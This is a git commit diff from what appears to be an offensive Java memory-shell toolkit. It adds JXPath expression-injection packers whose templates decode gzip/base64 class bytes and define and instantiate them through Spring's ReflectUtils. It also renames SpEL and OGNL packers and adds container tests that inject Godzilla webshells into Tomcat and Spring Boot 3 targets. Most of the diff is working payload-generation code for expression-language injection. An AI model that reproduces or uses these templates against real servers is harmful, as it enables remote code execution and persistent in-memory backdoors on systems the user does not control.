feat: support JXPathSpringGzipPacker

Author: ReaJason

integration-test/build.gradle.kts

@@ -28,6 +28,7 @@ dependencies {
     testImplementation(libs.junit.platform.reporting)
     testImplementation(libs.junit.jupiter)
     testImplementation(libs.junit.pioneer)
+    testImplementation(libs.logback.classic)
     testRuntimeOnly(libs.junit.platform.launcher)
     testImplementation(libs.hamcrest)
     testImplementation(libs.bundles.testcontainers)

integration-test/src/test/java/com/reajason/javaweb/integration/ShellAssertion.java

@@ -296,7 +296,9 @@ public static MemShellResult generate(String urlPattern, String server, String s
         if (StringUtils.isNotBlank(urlPattern)) {
             injectorConfig.setUrlPattern(urlPattern);
         }
-        if (Packers.SpELSpringIOUtilsJDK17.equals(packer)) {
+        if (Packers.SpELSpringGzipJDK17.equals(packer)
+                || Packers.OGNLSpringGzipJDK17.equals(packer)
+                || Packers.JXPathSpringGzipJDK17.equals(packer)) {
             injectorConfig.setInjectorClassName("org.springframework.expression." + INJECTOR_CLASS_NAMES[new Random().nextInt(INJECTOR_CLASS_NAMES.length)] + getRandomString(5));
         }
 
@@ -328,13 +330,15 @@ public static void injectIsOk(String url, String shellType, String shellTool, St
                 VulTool.uploadJspFileToServer(uploadEntry, filename, content);
                 VulTool.urlIsOk(shellUrl);
             }
-            case ScriptEngine, DefaultScriptEngine, ScriptEngineBigInteger -> VulTool.postIsOk(url + "/js", content);
+            case DefaultScriptEngine, ScriptEngineNoSquareBrackets, ScriptEngineBigInteger ->
+                    VulTool.postIsOk(url + "/js", content);
             case EL -> VulTool.postIsOk(url + "/el", content);
-            case SpEL, SpELSpringIOUtils, SpELScriptEngine, SpELSpringIOUtilsJDK17 ->
+            case SpELSpringGzip, SpELScriptEngine, SpELSpringGzipJDK17 ->
                     VulTool.postIsOk(url + "/spel", content);
-            case OGNL, OGNLSpringIOUtils, OGNLScriptEngine -> VulTool.postIsOk(url + "/ognl", content);
+            case OGNLSpringGzip, OGNLScriptEngine, OGNLSpringGzipJDK17 -> VulTool.postIsOk(url + "/ognl", content);
             case MVEL -> VulTool.postIsOk(url + "/mvel", content);
-            case JXPath -> VulTool.postIsOk(url + "/jxpath", content);
+            case JXPathScriptEngine, JXPathSpringGzip, JXPathSpringGzipJDK17 ->
+                    VulTool.postIsOk(url + "/jxpath", content);
             case JEXL -> VulTool.postIsOk(url + "/jexl2", content);
             case Aviator -> VulTool.postIsOk(url + "/aviator", content);
             case Groovy -> VulTool.postIsOk(url + "/groovy", content);

integration-test/src/test/java/com/reajason/javaweb/integration/memshell/springwebmvc/SpringBoot3ContainerTest.java

@@ -102,9 +102,4 @@ static Stream<Arguments> tomcatCasesProvider() {
     void testTomcat(String imageName, String shellType, String shellTool, Packers packer) {
         shellInjectIsOk(getUrl(container), Server.Tomcat, shellType, shellTool, Opcodes.V17, packer, container, python);
     }
-
-    @Test
-    void testCommandValveSpELSpringIOUtilsJDK17() {
-        ShellAssertion.shellInjectIsOk(getUrl(container), Server.Tomcat, ShellType.JAKARTA_VALVE, ShellTool.Command, Opcodes.V17, Packers.SpELSpringIOUtilsJDK17, container);
-    }
 }

integration-test/src/test/java/com/reajason/javaweb/integration/memshell/springwebmvc/SpringBoot3ExpressionContainerTest.java

@@ -0,0 +1,71 @@
+package com.reajason.javaweb.integration.memshell.springwebmvc;
+
+import com.reajason.javaweb.Server;
+import com.reajason.javaweb.integration.ShellAssertion;
+import com.reajason.javaweb.memshell.ShellTool;
+import com.reajason.javaweb.memshell.ShellType;
+import com.reajason.javaweb.packer.Packers;
+import lombok.extern.slf4j.Slf4j;
+import net.bytebuddy.jar.asm.Opcodes;
+import org.junit.jupiter.api.AfterAll;
+import org.junit.jupiter.params.ParameterizedTest;
+import org.junit.jupiter.params.provider.Arguments;
+import org.junit.jupiter.params.provider.MethodSource;
+import org.testcontainers.containers.GenericContainer;
+import org.testcontainers.containers.wait.strategy.Wait;
+import org.testcontainers.images.builder.ImageFromDockerfile;
+import org.testcontainers.junit.jupiter.Container;
+import org.testcontainers.junit.jupiter.Testcontainers;
+
+import java.util.stream.Stream;
+
+import static com.reajason.javaweb.integration.ContainerTool.*;
+import static org.junit.jupiter.params.provider.Arguments.arguments;
+
+/**
+ * @author ReaJason
+ * @since 2024/12/22
+ */
+@Testcontainers
+@Slf4j
+public class SpringBoot3ExpressionContainerTest {
+    public static final String imageName = "springboot3";
+
+    @Container
+    public final static GenericContainer<?> container = new GenericContainer<>(new ImageFromDockerfile()
+            .withDockerfile(springBoot3Dockerfile))
+            .withCopyToContainer(jattachFile, "/jattach")
+            .withCopyToContainer(springbootPid, "/fetch_pid.sh")
+            .waitingFor(Wait.forHttp("/test"))
+            .withExposedPorts(8080);
+
+
+    public static String getUrl(GenericContainer<?> container) {
+        String host = container.getHost();
+        int port = container.getMappedPort(8080);
+        String url = "http://" + host + ":" + port;
+        log.info("container started, app url is : {}", url);
+        return url;
+    }
+
+    @AfterAll
+    static void tearDown() {
+        String logs = container.getLogs();
+        log.info(logs);
+//        assertThat("Logs should not contain any exceptions", logs, doesNotContainException());
+    }
+
+    static Stream<Arguments> casesProvider() {
+        return Stream.of(
+                arguments(imageName, ShellType.JAKARTA_VALVE, ShellTool.Godzilla, Packers.SpELSpringGzipJDK17),
+                arguments(imageName, ShellType.JAKARTA_VALVE, ShellTool.Godzilla, Packers.OGNLSpringGzipJDK17),
+                arguments(imageName, ShellType.JAKARTA_VALVE, ShellTool.Godzilla, Packers.JXPathSpringGzipJDK17)
+        );
+    }
+
+    @ParameterizedTest(name = "{0}-expression|{1}{2}|{3}")
+    @MethodSource("casesProvider")
+    void test(String imageName, String shellType, String shellTool, Packers packer) {
+        ShellAssertion.shellInjectIsOk(getUrl(container), Server.Tomcat, shellType, shellTool, Opcodes.V17, packer, container);
+    }
+}

integration-test/src/test/java/com/reajason/javaweb/integration/memshell/tomcat/Tomcat8ExpressionContainerTest.java

@@ -44,16 +44,17 @@ static Stream<Arguments> casesProvider() {
         return Stream.of(
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.EL),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.OGNLScriptEngine),
-                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.OGNLSpringIOUtils),
+                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.OGNLSpringGzip),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.MVEL),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.SpELScriptEngine),
-                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.SpELSpringIOUtils),
+                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.SpELSpringGzip),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.JEXL),
-                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.JXPath),
+                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.JXPathScriptEngine),
+                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.JXPathSpringGzip),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.Aviator),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.BeanShell),
-                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.ScriptEngine),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.DefaultScriptEngine),
+                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.ScriptEngineNoSquareBrackets),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.ScriptEngineBigInteger),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.Groovy),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.Rhino),

packer/src/main/java/com/reajason/javaweb/packer/Packers.java

@@ -29,18 +29,23 @@
 import com.reajason.javaweb.packer.jsp.JspPacker;
 import com.reajason.javaweb.packer.jsp.JspxPacker;
 import com.reajason.javaweb.packer.jxpath.JXPathPacker;
+import com.reajason.javaweb.packer.jxpath.JXPathScriptEnginePacker;
+import com.reajason.javaweb.packer.jxpath.JXPathSpringGzipJDK17Packer;
+import com.reajason.javaweb.packer.jxpath.JXPathSpringGzipPacker;
 import com.reajason.javaweb.packer.mvel.MVELPacker;
 import com.reajason.javaweb.packer.ognl.OGNLPacker;
 import com.reajason.javaweb.packer.ognl.OGNLScriptEnginePacker;
-import com.reajason.javaweb.packer.ognl.OGNLSpringIOUtilsGzipPacker;
+import com.reajason.javaweb.packer.ognl.OGNLSpringGzipJDK17Packer;
+import com.reajason.javaweb.packer.ognl.OGNLSpringGzipPacker;
 import com.reajason.javaweb.packer.rhino.RhinoPacker;
 import com.reajason.javaweb.packer.scriptengine.DefaultScriptEnginePacker;
 import com.reajason.javaweb.packer.scriptengine.ScriptEngineBigIntegerPacker;
+import com.reajason.javaweb.packer.scriptengine.ScriptEngineNoSquareBracketsPacker;
 import com.reajason.javaweb.packer.scriptengine.ScriptEnginePacker;
 import com.reajason.javaweb.packer.spel.SpELPacker;
 import com.reajason.javaweb.packer.spel.SpELScriptEnginePacker;
-import com.reajason.javaweb.packer.spel.SpELSpringIOUtilsGzipJDK17Packer;
-import com.reajason.javaweb.packer.spel.SpELSpringIOUtilsGzipPacker;
+import com.reajason.javaweb.packer.spel.SpELSpringGzipJDK17Packer;
+import com.reajason.javaweb.packer.spel.SpELSpringGzipPacker;
 import com.reajason.javaweb.packer.velocity.VelocityPacker;
 import com.reajason.javaweb.packer.xmldecoder.XMLDecoderDefineClassPacker;
 import com.reajason.javaweb.packer.xmldecoder.XMLDecoderPacker;
@@ -90,6 +95,7 @@ public enum Packers {
      */
     ScriptEngine(new ScriptEnginePacker()),
     DefaultScriptEngine(new DefaultScriptEnginePacker(), ScriptEnginePacker.class),
+    ScriptEngineNoSquareBrackets(new ScriptEngineNoSquareBracketsPacker(), ScriptEnginePacker.class),
     ScriptEngineBigInteger(new ScriptEngineBigIntegerPacker(), ScriptEnginePacker.class),
     Rhino(new RhinoPacker()),
 
@@ -100,18 +106,24 @@ public enum Packers {
 
     OGNL(new OGNLPacker()),
     OGNLScriptEngine(new OGNLScriptEnginePacker(), OGNLPacker.class),
-    OGNLSpringIOUtils(new OGNLSpringIOUtilsGzipPacker(), OGNLPacker.class),
+    OGNLSpringGzip(new OGNLSpringGzipPacker(), OGNLPacker.class),
+    OGNLSpringGzipJDK17(new OGNLSpringGzipJDK17Packer(), OGNLPacker.class),
 
     MVEL(new MVELPacker()),
     Aviator(new AviatorPacker()),
+
     JXPath(new JXPathPacker()),
+    JXPathSpringGzip(new JXPathSpringGzipPacker(), JXPathPacker.class),
+    JXPathSpringGzipJDK17(new JXPathSpringGzipJDK17Packer(), JXPathPacker.class),
+
+
     JEXL(new JEXLPacker()),
     BeanShell(new BeanShellPacker()),
 
     SpEL(new SpELPacker()),
     SpELScriptEngine(new SpELScriptEnginePacker(), SpELPacker.class),
-    SpELSpringIOUtils(new SpELSpringIOUtilsGzipPacker(), SpELPacker.class),
-    SpELSpringIOUtilsJDK17(new SpELSpringIOUtilsGzipJDK17Packer(), SpELPacker.class),
+    SpELSpringGzip(new SpELSpringGzipPacker(), SpELPacker.class),
+    SpELSpringGzipJDK17(new SpELSpringGzipJDK17Packer(), SpELPacker.class),
 
     Groovy(new GroovyPacker()),
     GroovyClassDefiner(new GroovyClassDefinerPacker(), GroovyPacker.class),

packer/src/main/java/com/reajason/javaweb/packer/jxpath/JXPathPacker.java

@@ -1,19 +1,11 @@
 package com.reajason.javaweb.packer.jxpath;
 
-import com.reajason.javaweb.packer.ClassPackerConfig;
-import com.reajason.javaweb.packer.Packer;
-import com.reajason.javaweb.packer.Packers;
+import com.reajason.javaweb.packer.AggregatePacker;
 
 /**
  * @author ReaJason
  * @since 2024/12/13
  */
-public class JXPathPacker implements Packer {
-    String template = "eval(getEngineByName(javax.script.ScriptEngineManager.new(), 'js'), '{{script}}')";
+public class JXPathPacker implements AggregatePacker {
 
-    @Override
-    public String pack(ClassPackerConfig config) {
-        String script = Packers.ScriptEngine.getInstance().pack(config);
-        return template.replace("{{script}}", script);
-    }
 }

packer/src/main/java/com/reajason/javaweb/packer/jxpath/JXPathScriptEnginePacker.java

@@ -0,0 +1,19 @@
+package com.reajason.javaweb.packer.jxpath;
+
+import com.reajason.javaweb.packer.ClassPackerConfig;
+import com.reajason.javaweb.packer.Packer;
+import com.reajason.javaweb.packer.Packers;
+
+/**
+ * @author ReaJason
+ * @since 2024/12/13
+ */
+public class JXPathScriptEnginePacker implements Packer {
+    String template = "eval(getEngineByName(javax.script.ScriptEngineManager.new(), 'js'), '{{script}}')";
+
+    @Override
+    public String pack(ClassPackerConfig config) {
+        String script = Packers.ScriptEngineNoSquareBrackets.getInstance().pack(config);
+        return template.replace("{{script}}", script);
+    }
+}

packer/src/main/java/com/reajason/javaweb/packer/jxpath/JXPathSpringGzipJDK17Packer.java

@@ -0,0 +1,23 @@
+package com.reajason.javaweb.packer.jxpath;
+
+import com.reajason.javaweb.packer.ClassPackerConfig;
+import com.reajason.javaweb.packer.Packer;
+import com.reajason.javaweb.packer.Packers;
+
+import static com.reajason.javaweb.packer.spel.SpELSpringGzipJDK17Packer.assertClassNameValid;
+
+/**
+ * @author ReaJason
+ * @since 2024/12/13
+ */
+public class JXPathSpringGzipJDK17Packer implements Packer {
+    String template = "newInstance(org.springframework.cglib.core.ReflectUtils.defineClass('{{className}}',org.springframework.util.StreamUtils.copyToByteArray(java.util.zip.GZIPInputStream.new(java.io.ByteArrayInputStream.new(org.springframework.util.Base64Utils.decodeFromString('{{base64Str}}')))),getContextClassLoader(java.lang.Thread.currentThread()),getProtectionDomain(java.lang.Class.forName('org.springframework.expression.ExpressionParser')),java.lang.Class.forName('org.springframework.expression.ExpressionParser')))";
+
+    @Override
+    public String pack(ClassPackerConfig config) {
+        String className = config.getClassName();
+        assertClassNameValid(className);
+        return template.replace("{{className}}", className)
+                .replace("{{base64Str}}", Packers.GzipBase64.getInstance().pack(config));
+    }
+}

packer/src/main/java/com/reajason/javaweb/packer/jxpath/JXPathSpringGzipPacker.java

@@ -0,0 +1,19 @@
+package com.reajason.javaweb.packer.jxpath;
+
+import com.reajason.javaweb.packer.ClassPackerConfig;
+import com.reajason.javaweb.packer.Packer;
+import com.reajason.javaweb.packer.Packers;
+
+/**
+ * @author ReaJason
+ * @since 2024/12/13
+ */
+public class JXPathSpringGzipPacker implements Packer {
+    String template = "newInstance(org.springframework.cglib.core.ReflectUtils.defineClass('{{className}}',org.springframework.util.StreamUtils.copyToByteArray(java.util.zip.GZIPInputStream.new(java.io.ByteArrayInputStream.new(org.springframework.util.Base64Utils.decodeFromString('{{base64Str}}')))),getContextClassLoader(java.lang.Thread.currentThread())))";
+
+    @Override
+    public String pack(ClassPackerConfig config) {
+        return template.replace("{{className}}", config.getClassName())
+                .replace("{{base64Str}}", Packers.GzipBase64.getInstance().pack(config));
+    }
+}